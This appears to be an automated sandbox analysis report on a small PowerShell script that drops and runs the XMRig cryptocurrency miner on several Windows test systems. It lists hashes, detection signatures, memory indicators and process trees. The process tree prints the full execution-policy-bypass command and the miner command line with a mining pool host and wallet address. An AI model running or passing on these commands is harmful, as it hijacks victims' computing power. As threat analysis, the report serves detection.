Overview
overview
10Static
static
1file01 - c...2).ps1
windows7-x64
3file01 - c...2).ps1
windows10-1703-x64
10file01 - c...2).ps1
windows10-2004-x64
10file01 - c...2).ps1
windows11-21h2-x64
10file01 - c...3).ps1
windows10-2004-x64
10file01 - c...3).ps1
windows10-1703-x64
10file01 - c...3).ps1
windows10-2004-x64
10file01 - c...3).ps1
windows11-21h2-x64
10file01 - c...4).ps1
windows11-21h2-x64
10file01 - c...4).ps1
windows10-1703-x64
8file01 - c...4).ps1
windows10-2004-x64
10file01 - c...4).ps1
windows11-21h2-x64
10file01 - c...5).ps1
windows11-21h2-x64
10file01 - c...5).ps1
windows10-1703-x64
10file01 - c...5).ps1
windows10-2004-x64
10file01 - c...5).ps1
windows11-21h2-x64
10file01 - c...6).ps1
windows11-21h2-x64
10file01 - c...6).ps1
windows10-1703-x64
10file01 - c...6).ps1
windows10-2004-x64
10file01 - c...6).ps1
windows11-21h2-x64
10file01 - c...7).ps1
windows11-21h2-x64
10file01 - c...7).ps1
windows10-1703-x64
10file01 - c...7).ps1
windows10-2004-x64
10file01 - c...7).ps1
windows11-21h2-x64
10file01 - c...8).ps1
windows11-21h2-x64
10file01 - c...8).ps1
windows10-1703-x64
10file01 - c...8).ps1
windows10-2004-x64
10file01 - c...8).ps1
windows11-21h2-x64
10file01 - c...9).ps1
windows11-21h2-x64
10file01 - c...9).ps1
windows10-1703-x64
10file01 - c...9).ps1
windows10-2004-x64
10file01 - c...9).ps1
windows11-21h2-x64
10Resubmissions
27-05-2024 18:28
240527-w4c4xsdc7w 1027-05-2024 18:28
240527-w4c4xsdc7v 1027-05-2024 18:28
240527-w4cs6aed49 1027-05-2024 18:28
240527-w4cs6aed48 1027-05-2024 18:28
240527-w4cs6aed47 1027-05-2024 18:28
240527-w4c4xsed52Analysis
-
max time kernel
1799s -
max time network
1747s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 20:05
Static task
static1
Behavioral task
behavioral1
Sample
file01 - copia (2).ps1
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file01 - copia (2).ps1
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
file01 - copia (2).ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
file01 - copia (2).ps1
Resource
win11-20240508-en
Behavioral task
behavioral5
Sample
file01 - copia (3).ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral6
Sample
file01 - copia (3).ps1
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
file01 - copia (3).ps1
Resource
win10v2004-20240508-en
Behavioral task
behavioral8
Sample
file01 - copia (3).ps1
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
file01 - copia (4).ps1
Resource
win11-20240426-en
Behavioral task
behavioral10
Sample
file01 - copia (4).ps1
Resource
win10-20240404-en
Behavioral task
behavioral11
Sample
file01 - copia (4).ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
file01 - copia (4).ps1
Resource
win11-20240419-en
Behavioral task
behavioral13
Sample
file01 - copia (5).ps1
Resource
win11-20240426-en
Behavioral task
behavioral14
Sample
file01 - copia (5).ps1
Resource
win10-20240404-en
Behavioral task
behavioral15
Sample
file01 - copia (5).ps1
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
file01 - copia (5).ps1
Resource
win11-20240508-en
Behavioral task
behavioral17
Sample
file01 - copia (6).ps1
Resource
win11-20240426-en
Behavioral task
behavioral18
Sample
file01 - copia (6).ps1
Resource
win10-20240404-en
Behavioral task
behavioral19
Sample
file01 - copia (6).ps1
Resource
win10v2004-20240508-en
Behavioral task
behavioral20
Sample
file01 - copia (6).ps1
Resource
win11-20240426-en
Behavioral task
behavioral21
Sample
file01 - copia (7).ps1
Resource
win11-20240426-en
Behavioral task
behavioral22
Sample
file01 - copia (7).ps1
Resource
win10-20240404-en
Behavioral task
behavioral23
Sample
file01 - copia (7).ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral24
Sample
file01 - copia (7).ps1
Resource
win11-20240426-en
Behavioral task
behavioral25
Sample
file01 - copia (8).ps1
Resource
win11-20240508-en
Behavioral task
behavioral26
Sample
file01 - copia (8).ps1
Resource
win10-20240404-en
Behavioral task
behavioral27
Sample
file01 - copia (8).ps1
Resource
win10v2004-20240426-en
Behavioral task
behavioral28
Sample
file01 - copia (8).ps1
Resource
win11-20240508-en
Behavioral task
behavioral29
Sample
file01 - copia (9).ps1
Resource
win11-20240426-en
Behavioral task
behavioral30
Sample
file01 - copia (9).ps1
Resource
win10-20240404-en
Behavioral task
behavioral31
Sample
file01 - copia (9).ps1
Resource
win10v2004-20240508-en
General
-
Target
file01 - copia (2).ps1
-
Size
510B
-
MD5
2dcb4d51653aec1a829f3232d69f5e12
-
SHA1
dd096e7d800b9f3ca0edc64955b4464d71789f80
-
SHA256
d1902d3e519d0d87097fd8969280bd01bd139a5191faadaed0149e61b4a7495c
-
SHA512
7def3731bbb3f7ac3895edcf14c645bbcc0608f09c6b03bf7ddaebf049f1f6f1aad4086548ab9fce7b2bbefd837de8377f8b81cf94022d84e35f1bba0af89143
Malware Config
Signatures
-
XMRig Miner payload 64 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe xmrig behavioral3/memory/384-49-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-50-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-55-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-57-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-60-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-61-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-62-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-63-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-64-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-65-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-66-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-67-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-68-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-69-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-70-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-71-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-72-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-73-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-74-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-75-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-76-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-77-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-78-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-79-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-80-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-81-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-82-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-83-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-84-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-85-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-86-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-87-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-88-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-89-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-90-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-91-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-92-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-93-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-94-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-95-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-96-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-97-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-98-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-99-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-100-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-101-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-102-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-103-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-104-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-105-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-106-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-107-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-108-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-109-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-110-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-111-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-112-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-113-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-114-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-115-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-116-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig behavioral3/memory/384-117-0x00007FF653D70000-0x00007FF6549A3000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 1572 powershell.exe 11 1572 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
xmrig.exepid process 384 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1572 powershell.exe 1572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exexmrig.exedescription pid process Token: SeDebugPrivilege 1572 powershell.exe Token: SeLockMemoryPrivilege 384 xmrig.exe Token: SeLockMemoryPrivilege 384 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
xmrig.exepid process 384 xmrig.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
powershell.exedescription pid process target process PID 1572 wrote to memory of 384 1572 powershell.exe xmrig.exe PID 1572 wrote to memory of 384 1572 powershell.exe xmrig.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:384
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.1MB
MD5205ad9eb6acd6f58752899669b69fe74
SHA1bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA2562025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA51228309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3